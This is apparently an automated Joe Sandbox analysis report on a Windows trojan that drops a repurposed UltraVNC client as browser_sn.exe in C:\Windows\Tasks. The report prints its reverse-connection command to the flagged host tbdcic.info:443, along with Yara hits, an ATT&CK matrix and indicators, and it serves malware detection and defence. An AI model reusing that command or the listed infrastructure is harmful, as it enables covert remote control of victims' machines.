Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C47B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,

24_2_00007FF790C47B90

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0040244E

Source: Xv6Ya.d8LhT.0.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: browser_sn.exe, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: browser_sn.exe, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Shell_TrayWnd
Source: browser_sn.exe, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Progman
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00402187

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00401815

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C99EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,

24_2_00007FF790C99EF0

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790CEDF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

24_2_00007FF790CEDF80

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00405721

Stealing of Sensitive Information

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 37.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T8xrZb7nBL.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 8328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 8704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 8944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED

Remote Access Functionality

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 37.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T8xrZb7nBL.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 8328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 8704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 8944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: browser_sn.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Source: browser_sn.exe, 00000018.00000002.1545761810.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000023.00000003.1759022979.000000000272A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000023.00000002.2540148339.0000000002720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Windows Service	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Access Token Manipulation	1 Timestomp	NTDS	4 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	1 Bootkit	11 Windows Service	1 DLL Side-Loading	LSA Secrets	26 System Information Discovery	SSH	Keylogging	2 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	22 Process Injection	231 Masquerading	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Valid Accounts	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	22 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Bootkit	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
T8xrZb7nBL.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h	0%	ReversingLabs
C:\Windows\Tasks\Xv6Ya.d8LhT	0%	ReversingLabs
C:\Windows\Tasks\browser_sn.exe	0%	ReversingLabs
C:\Windows\Tasks\conhost.exe	0%	ReversingLabs
C:\Windows\Tasks\uqVb3.kkb9h	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
tbdcic.info	194.190.152.201	true	true	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
x1.i.lencr.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.uvnc.com	T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.15.dr	false	high
https://www.adobe.co	ReaderMessages.11.dr	false	high
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	high
http://www.uvnc.comopenhttp://forum.uvnc.comnet	T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	high
http://java.sun.com/products/plugin/index.html#download	T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	high
http://forum.uvnc.com	T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	unknown
http://ocsp.thawte.com0	T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.190.152.201	tbdcic.info	Russian Federation		41615	RSHB-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579878
Start date and time:	2024-12-23 13:28:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	T8xrZb7nBL.exe renamed because original name is a hash value
Original Sample Name:	d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
Detection:	MAL
Classification:	mal84.troj.spyw.evad.winEXE@69/63@4/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
